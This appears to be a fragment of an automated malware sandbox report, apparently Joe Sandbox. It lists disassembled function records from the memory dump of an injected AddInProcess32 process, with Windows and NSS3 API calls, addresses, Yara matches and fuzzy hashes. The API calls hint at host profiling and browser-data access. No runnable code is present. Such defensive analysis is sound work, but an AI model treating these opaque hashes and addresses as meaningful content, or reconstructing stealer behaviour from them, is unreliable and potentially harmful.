                                                                                        • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,759801C0,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 346377423-0
                                                                                      • Opcode ID: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                                                                      • Instruction ID: c7d19490b4b7bf55ff7d061cd44103b5bbdd205034f2344246e6d9ab79f340c2
                                                                                      • Opcode Fuzzy Hash: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                                                                      • Instruction Fuzzy Hash: 5C014071301624BBDB15AFA5CC86EEE7A6D9F09755F10007AB906BB2C1CE785E0097A8
                                                                                      APIs
                                                                                      • lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcmp
                                                                                      • String ID: Q2A
                                                                                      • API String ID: 1534048567-2123675874
                                                                                      • Opcode ID: 1fb8e036476019f25356a9dc81369f227010c5da235d04cad098e43340ef1dac
                                                                                      • Instruction ID: 7fcb071e5c92ef35872f29a83e6c265051a50058f6c1314db27c30e181e4f5fe
                                                                                      • Opcode Fuzzy Hash: 1fb8e036476019f25356a9dc81369f227010c5da235d04cad098e43340ef1dac
                                                                                      • Instruction Fuzzy Hash: 64015672A00618AFCB11DF9AC881DEAB7B8FF45304B10017AEA01D3711E734ED95CBA8
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(?,?,6CC63C8B,6CCB8B25,?,?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCA1B53
                                                                                      • sqlite3_mutex_leave.NSS3(6CCB8B25,0000000A,?,?,6CC63C8B,6CCB8B25,?,?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCA1B6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                      • String ID:
                                                                                      • API String ID: 1477753154-0
                                                                                      • Opcode ID: c047bbad978a47b831f20b33e06b43f349fb75d4bee25e8b55acc75147d4127d
                                                                                      • Instruction ID: a6f3c8dba4be7a696353c4202d80049bfe5c63ec9e438b9c250757485d45b345
                                                                                      • Opcode Fuzzy Hash: c047bbad978a47b831f20b33e06b43f349fb75d4bee25e8b55acc75147d4127d
                                                                                      • Instruction Fuzzy Hash: 39F03070512109EFEF109F99EC49AD87B79FB02BA4F108111F91885A70F731CA92CB95
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,?,00000001,00000000,00000003,00000000,00000000,?,?,?,0040A07E,C0000000,?,?), ref: 004116C7
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,0040A07E,C0000000,?,?), ref: 004116D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateSize
                                                                                      • String ID:
                                                                                      • API String ID: 2791376181-0
                                                                                      • Opcode ID: b762c129a2a900235e323e8419163b13a8f394dbefe672e3dcbcfac5151d327d
                                                                                      • Instruction ID: 747515d520271cb7f71a969de0445caa0c90bcf593a358851f6b0538be71d1a9
                                                                                      • Opcode Fuzzy Hash: b762c129a2a900235e323e8419163b13a8f394dbefe672e3dcbcfac5151d327d
                                                                                      • Instruction Fuzzy Hash: 01E06D326403007BC3309F77DC4DD87BEBCEBC6B70B008A2AB56AC22A0E2719481C664
                                                                                      APIs
                                                                                      Strings
                                                                                      • failed to allocate %u bytes of memory, xrefs: 6CC6583B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                      • API String ID: 2803490479-1168259600
                                                                                      • Opcode ID: 9a2f6123136ea74b32cdc9f463db5fa651e10654bf8787d6d68598c3cd9a0615
                                                                                      • Instruction ID: aa904e6acd676667e57939843e1f09807a8bf247a9005845487627b7b7b5fedd
                                                                                      • Opcode Fuzzy Hash: 9a2f6123136ea74b32cdc9f463db5fa651e10654bf8787d6d68598c3cd9a0615
                                                                                      • Instruction Fuzzy Hash: 52D0A932A4412877EA112A86EC409CABF29DB057F9F400232FF0C9AF51E62298204BC0
                                                                                      APIs
                                                                                      • sqlite3_initialize.NSS3(?,6CC63A78,6CD51024,?,?), ref: 6CC63B3E
                                                                                      • sqlite3_vmprintf.NSS3(?,6CD51024,?,6CC63A78,6CD51024,?,?), ref: 6CC63B52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_initializesqlite3_vmprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2447716421-0
                                                                                      • Opcode ID: 7a7d2359c63ceeee4ad14dc1f7f229e6ea04cc1cb59802d0e84eb7205c83e167
                                                                                      • Instruction ID: 5d3acad3e3d50b411c713d6f43764881e3a5190da8caeca0a969fe1b05f3bf89
                                                                                      • Opcode Fuzzy Hash: 7a7d2359c63ceeee4ad14dc1f7f229e6ea04cc1cb59802d0e84eb7205c83e167
                                                                                      • Instruction Fuzzy Hash: BEC0123200C20C6DAF459AB2A9818AE338CCA80628B144026B90C86E50FB22E55641A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1989f8f3aa73791389261c6b3f8eabb363cd9e338f6695dafaa4aaeaa3ceddc4
                                                                                      • Instruction ID: 5dd6116bdd8558761e66744faf498c4f4098b048928e4b12ad4dbe162fbca709
                                                                                      • Opcode Fuzzy Hash: 1989f8f3aa73791389261c6b3f8eabb363cd9e338f6695dafaa4aaeaa3ceddc4
                                                                                      • Instruction Fuzzy Hash: 44D0C9A0A951015AEE58A7A54E0977B246EABD4306F16807DB50799184EA3848205529
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountSleepTick
                                                                                      • String ID:
                                                                                      • API String ID: 2804873075-0
                                                                                      • Opcode ID: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                                                                      • Instruction ID: cb4e42e87864ed722aedde75ee5ec1912828b431a3830261680a48f961af466f
                                                                                      • Opcode Fuzzy Hash: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                                                                      • Instruction Fuzzy Hash: EDD0123035C104AFE30C9B59FC5E7A57A6ED7D5705F04C03BF60EC92E1C9B195554598
                                                                                      APIs
                                                                                      • TerminateThread.KERNEL32(00000024,00000000,00000000,0040BBF0,?,?,?,?,?,00000000), ref: 00401FA4
                                                                                      • CloseHandle.KERNEL32(00000024,?,?,?,?,00000000), ref: 00401FAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleTerminateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2476175854-0
                                                                                      • Opcode ID: 10a1c8d46553eea6a13ef40ff65d55fa1f25bf0e8a3eac6d85693a0daadccd3c
                                                                                      • Instruction ID: fa0e3a6ada9f19b9c61482069dd46a98af28b1234dcb6737ccc00d9eb483d333
                                                                                      • Opcode Fuzzy Hash: 10a1c8d46553eea6a13ef40ff65d55fa1f25bf0e8a3eac6d85693a0daadccd3c
                                                                                      • Instruction Fuzzy Hash: 7DD0CA32018221EFEB321F14EC08B81BBF0AB04312F21886AB0C0650B4D7B608D0CB58
                                                                                      APIs
                                                                                      • ReleaseMutex.KERNEL32(?,?,0041141C,.VA,00405D32,.VA,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 004117A7
                                                                                      • CloseHandle.KERNEL32(?), ref: 004117AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleMutexRelease
                                                                                      • String ID:
                                                                                      • API String ID: 4207627910-0
                                                                                      • Opcode ID: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                                                                      • Instruction ID: da85866315e866d9b3d8c4bbf16f7db246e1d0e2a6d46926b2ed1ada722145db
                                                                                      • Opcode Fuzzy Hash: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                                                                      • Instruction Fuzzy Hash: FFB0923A009020EFEB222F14FC0C8C4BBB5EF0925131185BAF08182138CBB20C519B94
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00403156,?,00405D68,00000000,?,00412694,?,?,0041577A), ref: 00406037
                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,0041577A), ref: 0040603E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$FreeProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3859560861-0
                                                                                      • Opcode ID: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                                                                      • Instruction ID: 97b5132d47626f22dbbfebbef4f37b02692f87ed7e1fea3e09d59c323e792602
                                                                                      • Opcode Fuzzy Hash: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                                                                      • Instruction Fuzzy Hash: 27A002719682009BDE5467B09E0DB563939A748702F048554B20985151D67454018675
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1357844191-0
                                                                                      • Opcode ID: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                                                                      • Instruction ID: edbd1dd06743cb7a1a2c428d36d16fad14126cf83079969d3a169869f5bf1203
                                                                                      • Opcode Fuzzy Hash: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                                                                      • Instruction Fuzzy Hash: 06B00275558200ABDE516BA09F0DB597A75AB48702F048594B24585060C77544519B66
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$FreeProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3859560861-0
                                                                                      • Opcode ID: 156927e372652f8f96686f521bc17954d918b764854843aced2cc5c601c062f1
                                                                                      • Instruction ID: 09f30d6fdcf717ce78d405049944c27f2579c0e41645bb3766fd1bc4e6a3bb9f
                                                                                      • Opcode Fuzzy Hash: 156927e372652f8f96686f521bc17954d918b764854843aced2cc5c601c062f1
                                                                                      • Instruction Fuzzy Hash: 5DB00275958200ABDE516BB09E0DB5A7A75AB48702F048454B24985161C67544119B66
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(?,?,?,?,?), ref: 00415C87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event
                                                                                      • String ID:
                                                                                      • API String ID: 4201588131-0
                                                                                      • Opcode ID: 19b2ef278710e7d7c3619832f834a55cb010f2b114e5bdac0b3a85f685fc37e7
                                                                                      • Instruction ID: c112681a3f60aaee252ae77a157792cc0d6a1c9913db80fceddbf09c810ec833
                                                                                      • Opcode Fuzzy Hash: 19b2ef278710e7d7c3619832f834a55cb010f2b114e5bdac0b3a85f685fc37e7
                                                                                      • Instruction Fuzzy Hash: 69518B34100606EFCB14DF24C9A4CEA7BB6FBD0306B10461AD81293364E73DE9C9EB98
                                                                                      APIs
                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$DispatcherExceptionFolderPathSpecialUser
                                                                                      • String ID:
                                                                                      • API String ID: 3679583613-0
                                                                                      • Opcode ID: 0b3bc671ef4c215de584d6d80de21ec1356a9fd2a2ef59d66775b7431f71f22b
                                                                                      • Instruction ID: cf24a81cd299cbc4f05302b0a76130d0710c8618247d4c3c57238b1560f083e9
                                                                                      • Opcode Fuzzy Hash: 0b3bc671ef4c215de584d6d80de21ec1356a9fd2a2ef59d66775b7431f71f22b
                                                                                      • Instruction Fuzzy Hash: 6BE0D875B0031837DB70A6169C0EFC73A6CCBC0715F0001B2BA58E32D1ED74EA45C6A4
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,759801C0,?,?,0041270B,?,?), ref: 00412534
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                                                                      • Instruction ID: 6b4a3946c2a43bcd037634b81ad519b7cc297f2607030efe808653eea7f4a6e3
                                                                                      • Opcode Fuzzy Hash: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                                                                      • Instruction Fuzzy Hash: DCE0D832515325FFDB208B528D48ECB7F7DDB057E4F008115F509D2150D2B18640D5F4
                                                                                      APIs
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$DispatcherEnvironmentExceptionExpandStringsUser
                                                                                      • String ID:
                                                                                      • API String ID: 1216311190-0
                                                                                      • Opcode ID: bbbe7fcf7b08c3152271c76c15a9da5710fa2dcc1ad07d5f9086eea5aef8585d
                                                                                      • Instruction ID: c9e9bc113a16d457794ea73b6dea9160bc4569d11f418ada23e118eebf44067f
                                                                                      • Opcode Fuzzy Hash: bbbe7fcf7b08c3152271c76c15a9da5710fa2dcc1ad07d5f9086eea5aef8585d
                                                                                      • Instruction Fuzzy Hash: E9E048B670015967DB30A6169C06FD6776DDBC471CF0400B9B709F21D0E975DA06C6A8
                                                                                      APIs
                                                                                      • GetComputerNameW.KERNEL32(00402EBA,00000010), ref: 004111C0
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$ComputerDispatcherExceptionNameUser
                                                                                      • String ID:
                                                                                      • API String ID: 3218006343-0
                                                                                      • Opcode ID: 3eb0ade81335bde968575cd2d1a6a3fe4fa243b4d7fd77ecc9185df505b25c6f
                                                                                      • Instruction ID: 945d34904aeac683ef2bbcc9e32925d7ba44cfe3ff41eff4d8a6833788992863
                                                                                      • Opcode Fuzzy Hash: 3eb0ade81335bde968575cd2d1a6a3fe4fa243b4d7fd77ecc9185df505b25c6f
                                                                                      • Instruction Fuzzy Hash: C2E01A72A0411CA7CF14DAAAD9099CFBBFC9B88754F1005A6E505F7280DAB1AF4887A4
                                                                                      APIs
                                                                                      • wsprintfW.USER32 ref: 0040339F
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,759801C0,?,?,?VA,?,00412AEE,?VA,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403477
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$DispatcherExceptionFreeUserVirtuallstrcatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 433610521-0
                                                                                      • Opcode ID: 3c1149fe274155a056e53b32e741fb06827eaa39f76e4894e7e4e51ecb696f01
                                                                                      • Instruction ID: 558f61007a4fd5d2bdb329b0e5b37003655523a9056341c5bb016a9b1edf3042
                                                                                      • Opcode Fuzzy Hash: 3c1149fe274155a056e53b32e741fb06827eaa39f76e4894e7e4e51ecb696f01
                                                                                      • Instruction Fuzzy Hash: CFE0657050021C67CF10EB55DC4ADCA3F2C9B00258F004076BC5597191DA78DB55CAD4
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCCC33F
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentErrorThread
                                                                                      • String ID:
                                                                                      • API String ID: 4105543822-0
                                                                                      • Opcode ID: ca4ea32f24d65e8f25b6db619cc4605b70b482488f15907206716fe2cdad0407
                                                                                      • Instruction ID: ec68f838223374a01af8fa1ddf410068d5310bdfeaba8e85c478d9a0b02ecb6f
                                                                                      • Opcode Fuzzy Hash: ca4ea32f24d65e8f25b6db619cc4605b70b482488f15907206716fe2cdad0407
                                                                                      • Instruction Fuzzy Hash: 86E08631258208EADB00AD24EC017D93BD5FB0075AF348464F825949D0E774E844D95E
                                                                                      APIs
                                                                                        • Part of subcall function 004117B7: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,759801C0,00000000,00405B72), ref: 004117BF
                                                                                      • WSAStartup.WS2_32(00000002,?), ref: 00405A4C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateMutexStartup
                                                                                      • String ID:
                                                                                      • API String ID: 3730780901-0
                                                                                      • Opcode ID: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                                                                      • Instruction ID: 2a260520f2afbb8a1e0ca9aeaaef8dbe40d0ee1d54cebc48408a6e1b33bc0553
                                                                                      • Opcode Fuzzy Hash: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                                                                      • Instruction Fuzzy Hash: 8DE03971500B008BC270AF2B9945893FBF8FF907207000A1FE5A682AA0C7B0B1048B54
                                                                                      APIs
                                                                                      • PR_LoadLibraryWithFlags.NSS3(00000000), ref: 6CCCC310
                                                                                        • Part of subcall function 6CCCC31E: PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCCC33F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFlagsLibraryLoadWith
                                                                                      • String ID:
                                                                                      • API String ID: 3713286309-0
                                                                                      • Opcode ID: d17d27d6a893be113952fe739a7cdb518477149a8b3444977c0d514f0d75a5dc
                                                                                      • Instruction ID: bad686345b5ad735bf333d85f7b63697dc659279473182a07fd4f831a85e2c80
                                                                                      • Opcode Fuzzy Hash: d17d27d6a893be113952fe739a7cdb518477149a8b3444977c0d514f0d75a5dc
                                                                                      • Instruction Fuzzy Hash: 3DD01273D0010867CB00FE59A8067DFBBB8DB85251F0041A5ED189B240E572571947D2
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401F82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
